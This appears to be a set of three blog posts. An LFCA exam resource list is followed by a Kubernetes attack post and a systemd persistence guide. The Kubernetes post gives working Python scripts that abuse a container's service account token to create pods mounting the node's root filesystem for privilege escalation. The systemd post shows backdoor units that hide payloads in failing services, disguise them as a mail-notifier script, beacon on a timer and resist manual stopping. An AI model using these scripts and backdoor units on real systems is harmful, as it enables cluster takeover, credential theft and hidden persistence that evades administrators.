LFCA Exam, Resources, and Training

Linux Foundation Certified IT Associate (LFCA)

Exam Overview

Since I announced I was part of the team of individuals who helped develop the new Linux Foundation Certified IT Associate (LFCA) exam. I have been bombarded with questions. The majority of these questions I simply will not answer. The Linux Foundation maintains a separation between exam developers and trainers to protect the integrity of the certification.

However, many have asked questions about where to find materials to prepare for the certification, since a specific training course wasn’t released along side the exam. To those questions, I would mention that the Linux Foundation offers free introduction courses that are linked right on the exam page. These same courses have topics that cover the vast majority of the listed exam domain subjects.

Nonetheless exam its self is 60 multiple choice questions with an exam time of 90 minutes. Its also proctored virtually by PSI, alongside all of the other Linux Foundation exams. To support those taking the exam, I pulled together the exam domains, voucher, and handbook links to provide them bellow in a single place. I also provided a list of the free courses listed on the LFCA training page. Additionally, I re-ordered the courses based on pervious experience with the training materials and how the topics listed in the courses map to the exam domain subjects.

LFCA Exam Domains

The following is the full list of the exam domains and subjects covered directly from the certification documentations.

  1. Linux Fundamentals – 20%
    1. Linux Operating System
    2. File Management Commands
    3. System Commands
    4. General Networking Commands
  2. System Administration Fundamentals – 20%
    1. System Administration Tasks
    2. Networking
    3. Troubleshooting
  3. Cloud Computing Fundamentals – 20%
    1. Cloud Computing Fundamentals
    2. Performance / Availability
    3. Serverless
    4. Cloud Costs and Budgeting
  4. Security Fundamentals – 16%
    1. Security Basics
    2. Data Security
    3. Network Security
    4. System Security
  5. DevOps Fundamentals – 16%
    1. DevOps Basics
    2. Containers
    3. Deployment Environments
    4. Git Concepts
  6. Supporting Applications and Developers – 8%
    1. Software Project Management
    2. Software Application Architecture
    3. Functional Analysis
    4. Open-source Software and Licensing

Free Training from the Linux Foundation

These core courses offer roughly 120 hours of free material that relate directly to the exam domains.

  • Introduction to Linux – An introduction course to help build up the foundational Linux, system administration, and security knowledge listed in the core exam domains.
  • Basics of Cloud Computing – An introduction course that covers cloud infrastructure and the technologies that drive delivery. This course relates to the Cloud Computing Fundamentals exam domain.
  • DevOps Fundamentals – An introduction course to the principles and practices of development operations (DevOps). This course relates directly to the DevOps fundamentals exam domain.

These additional recommended courses that relate to one or more exam domains and provide additional detail.

  • Introduction to Kubernetes – An more in-depth dive into Kubernetes as a tool for containerized infrastructure. Highly recommended for those looking to break into the cloud space and/or purpose the CKA Exam.
  • Open Source Licensing – Open source software is now everywhere and the licensing can be very confusing at first. This course offers a clear and concise coverage of licensing, for those who may not encounter it often.
  • Beginners Guide to Software Development – This next course provides a basic introduction into the key concepts for open source software development. This course will give those who don’t develop software often, just enough to be dangerous.

LFCA Exam and Resources

  • LFCA Exam Voucher – This is the official Linux Foundation Certified IT Associate (LFCA) training page to purchase the exam voucher. This includes a retake if you don’t pass the exam on the first attempt.
  • LFCA Handbook – Exam specific handbooks are provided for all Linux Foundation exams and LFCA is no exception. Reading through the handbook will answer common questions regarding the exam, provide an introduction to the exam environment, and help calm some of the pre-exam nerves.

Abuse Kubernetes with the AutomountServiceAccountToken

While I was recently practicing to take my Certified Kuberenetes Administrator (CKA) exam, I ran across an interesting default option called automountServiceAccountToken. This option, automatically mounts the service account token, within each container of a given pod. This account token is meant to provide the pod the ability to interact with the Kubernetes API server. This option being enabled by default, creates a great way for attackers with access to a single container, to abuse Kubernetes with the Automount Service Account token.

What is the Service Account Token?

Within Kubernetes, even a pod with only a single container must have a service account within its specifications. This is because the service account dictates permissions and is used to run a pods processes. By default, if a service account isn’t provided during the creation of the pod, then the “default” service account for the pods namespace is added automatically. Without a different service account being automatically created within each namespace and added to each pod spec, there wouldn’t be any real resource/process separation happening between different namespaces.

How does automountServiceAccountToken work?

When a namespace is created within Kubernetes the kube-controller-manager uses the serviceaccount-controller and the token-controller to make sure the service account called “default” exists with a valid API Bearer token. When a pod is created within the new namespace, the admission controller then checks the pod spec for a valid service account and adds the “default” service account if one doesn’t exist. If the “automountServiceAccountToken” option isn’t explicitly set to false within either the pod spec or service account spec, then the admission controller will also add a volume mount for the service account token, to each container within the pod spec. This results in the namespaced secret for the service account token being mounted directly to “/var/run/secrets/kubernetes.io/serviceaccount” within every running container by default.

Why is the AutomountServiceAccountToken bad?

Since the permissions are assigned to a service account and all pod processes are run as the service account, effectively all pods within a given namespace operate at the same level. So when the service account token mount was added to provide better access to the Kubernetes API server, there wasn’t much need to disable it by default. Additionally, some popular tooling have utilized the service account token to communicate with Kubernetes and as such it may be required in order to meet compatibility requirements.

However, this token becomes problematic if an attacker gains access to a container via some other exploit. This is further compounded by the fact that the default service account permissions are effectively read-write within the namespace and global read for most resource types. So with a simple script or even curl commands we can abuse Kubernetes with the automount service account token.

How to Abuse AutomountServiceAccountToken

I could probably write a whole post around the topic of interacting with the Kubernetes API, but lucky almost all major programing languages already have Kubernetes client libraries. In my case, I often write in python and the python client library can handle loading a containers service account token. With that token we can utilize simple function calls like within the following example to create and even delete our own pods.

from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'busybox'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c", 
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ]
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom pod manifest")
v1.create_namespaced_pod(namespace=current_namespace, body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to delete the  busybox pod we just created")
v1.delete_namespaced_pod(name="busybox", namespace=current_namespace, body=client.V1DeleteOptions())

time.sleep(10)
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

Using service account token to escalate privilege with node root volume

Since by default there are not any pod security polices to restrict the ability to mount a nodes local root filesystem. We can try to leverage the service account token within a compromised container to create a new pod with a volume which mounts the nodes root filesystem with a similar script.

from kubernetes import client, config
import time

config.load_incluster_config()
from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'support'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c",
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ],
					'volumeMounts': [{
                        'name': 'host',
                        'mountPath': '/host'
                    }]
                }],
                'volumes': [{
                    'name': 'host',
                    'hostPath': {
                        'path': '/',
                        'type': 'Directory'
                    }
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom comand")
v1.create_namespaced_pod(namespace=current_namespace,body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

You can also use the node selector and label like “kubernetes.io/hostname” to try and get the new pod to spin up on a higher value control plane node.

With access to a pod container with the nodes root filesystem mounted, normal file and credential pillaging can take place. Also easier persistence methods can be used with write access, like adding a crontab or my recent post on leveraging controlled failure of systemd services, to gain a foot hold on the Kubernetes control plane.

How to Fix AutomountServiceAccountToken Issues?

Based on the official issue #57601, opened in late 2017. This issue is unlikely to be addressed until API v2 is available, because it’s currently required for backwards compatibility. That being said, this issue can still be addresses manually by setting “automountServiceAccountToken: false” on the “default” service account for each namespace and/or creating an Initializer to inject a custom service account upon pod creation. The only other option would be to patch a change to the admission controller, but that would risk issues with compatibility and break future upgrades.

Controlled Failure to Maintain Persistence using Systemd

Quite some time ago I wrote a blog post about how to maintain persistence with systemd services. I largely used it as a simple and reliable method to maintain access to systems during red-teaming and competitions/events. However, over the years administrators have become more accustom to systemd and how to work with its units. As a result these simplistic systemd service backdoors are caught rather quickly. So instead I’ve been modifying more recognizable/expect systemd services for controlled failure to maintain persistence.

Why Controlled Failure to Maintain Persistence?

Long story short, its much harder to detect a service with a common name that isn’t actually running when someone looks a a list of running services. It is also possible to hide activities from logging and other monitoring tools as well. Its also possible to utilize the StartLimit* options within a systemd unit, like a service, to create an effective beacon.

Method A: Force the Service to Fail in the Background

In this method we can simply have the service execute and background a given command, then exit 1/false. The result is a failed start and effectively result in the shell code running as a background zombie process. Bellow is a example of a service is very similar to the last systemd blog post.

[Service]
Type=simple
ExecStart=python -c '<shell code>' &; exit 1
Restart=always
RestartSec=300

The benefits are pretty simple, the service wont show when current running services are queried. Information about the process and the command run will be within the service logs. This could lead to quick discovery, if the logs and/or service errors are reviewed by an administrator. So overall I find this method is good for training and competitions where we want individuals to find artifacts to act upon.

In order to watch for unit failures, make it a common practice to run a command like ‘systemctl list-units –failed’ to review what’s going on with the system.

Method B: Expect failure and trigger OnFailure Unit

This method utilizes a legitimate service unit file from a common program, that’s not actually currently installed. Since the started services intended binaries and configuration files don’t actually exist, the service will fail to start. We can then use the OnFailure unit option to trigger another unit similar to this systemd-unit-status-mailer example. The idea being, we can hide our activity within another unit to leverage controlled failure to maintain persistence. An example for this method consists of the following.

Frist we can modify an existing unit or copy a new one from a common package and add OnFailure option to trigger the secondary unit.

 [Unit]
...
OnFailure=unit-status-mail@%n.service

Next we can utilize a legitimate looking secondary unit like the common unit status mailer to just execute our shell code.

[Unit]
Description=Unit Status Mailer Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/unit-status-mail.sh %I "Hostname: %H" "Machine ID: %m" "Boot ID: %b"

Finally we could add shellcode directly to the bash script run by the secondary service unit.

#!/bin/bash
MAILTO="root"
MAILFROM="unit-status-mailer"
UNIT=$1

EXTRA=""
for e in "${@:2}"; do
  EXTRA+="$e"$'\n'
done

UNITSTATUS=$(systemctl status $UNIT)

sendmail $MAILTO <<EOF
From:$MAILFROM
To:$MAILTO
Subject:Status mail for unit: $UNIT

Status report for unit: $UNIT
$EXTRA

$UNITSTATUS
EOF
python -c "<shell code>"
echo -e "Status mail sent to: $MAILTO for unit: $UNIT"

The main benefit of this method is the malicious process is nested within execution of a secondary systemd unit, which only triggers on failure. This means that the execution isn’t within the purview of systemd itself and therefore will not show up within standard logs.

Leveraging Start Limits for effective Beaconing

There are several options available to control how and when systemd will take an action on a given unit. We can use the unit options StartLimitBurst and StartLimitIntervalSec alongside the standard service option RestartSec. When used in combination with controlled service failure, we can create a timed gap between restart attempts for effective beaconing. Getting the timing right can be tricky, but a simple 5 minute beacon can be done like the following example.

[Unit]
Description=Backdoor
StartLimitBurst=12
StartLimitIntervalSec=3600

[Service]
Type=simple
ExecStart=python -c '<shell code>' &; exit 1
Restart=always
RestartSec=300

The option ‘RefuseManualStop=True’ can be used to prevent users from being able to manually stop a given service unit.